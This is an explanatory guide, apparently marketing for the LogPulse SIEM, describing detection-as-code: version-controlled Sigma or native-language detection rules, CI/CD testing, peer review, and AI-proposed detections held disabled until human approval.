Detection-as-code applies software-engineering discipline to security detections: instead of clicking rules together in a console, you write them as files, version them in Git, review them in pull requests, test them in CI/CD, and deploy them programmatically. The result is detections that are higher quality, auditable, and safe to change. This guide explains what detection-as-code is and how to adopt it.
What is detection-as-code?
Detection-as-code (DaC) treats detection rules as software artifacts. Rules live as text files in a version-controlled repository, changes go through peer-reviewed pull requests, automated tests verify they fire correctly, and deployment happens through a pipeline rather than by hand in a UI. It is the same workflow modern teams already use for application code, applied to the SIEM's detection content.
Why teams move to detection-as-code
- Rule quality — peer review catches mistakes before a noisy or broken rule reaches production.
- Change tracking — Git history shows who changed which detection, when, and why.
- Fast rollback — a problematic detection can be reverted like any code change.
- Replication — the same vetted detection set can be deployed across environments consistently.
- Collaboration — detection engineering becomes a team practice with a clear review trail.
How it works
- Repository — store detection rules as files in Git (GitHub, GitLab).
- Rule format — author in a format that supports automation: Sigma (vendor-neutral) or a native query language such as LPQL, SPL or KQL.
- CI/CD testing — on every change, a pipeline validates syntax and runs tests, often generating test events (e.g. with Atomic Red Team) to confirm the rule actually fires.
- Review & merge — changes are peer-reviewed in a pull request before they land.
- Deploy — merged rules are pushed to the SIEM programmatically.
Sigma: the portable detection format
Sigma is an open-source, vendor-agnostic signature format for SIEM detections. You write the detection logic once and convert it to the native query language of your platform (SPL, KQL, Elastic DSL, and others) with the Sigma toolchain. Because it is text-based and portable, Sigma is a natural fit for a version-controlled, detection-as-code workflow.
Detection engineering is a lifecycle
Detection-as-code is the delivery mechanism for detection engineering — the broader practice of researching threats, writing detections, testing them against real attack techniques, tuning out false positives, and retiring stale rules.
How LogPulse supports detection-as-code
In LogPulse, detections are LPQL queries — any saved LPQL search can become a custom detection, MITRE-tagged — and Sigma rules can be imported and transpiled to LPQL, so existing detection content carries over. AI agents can propose new detections over the MCP server, created disabled until a human approves — a review gate that mirrors the pull-request model. See what is SIEM for where detections sit, and Security Monitoring (SIEM) for the full detection capability.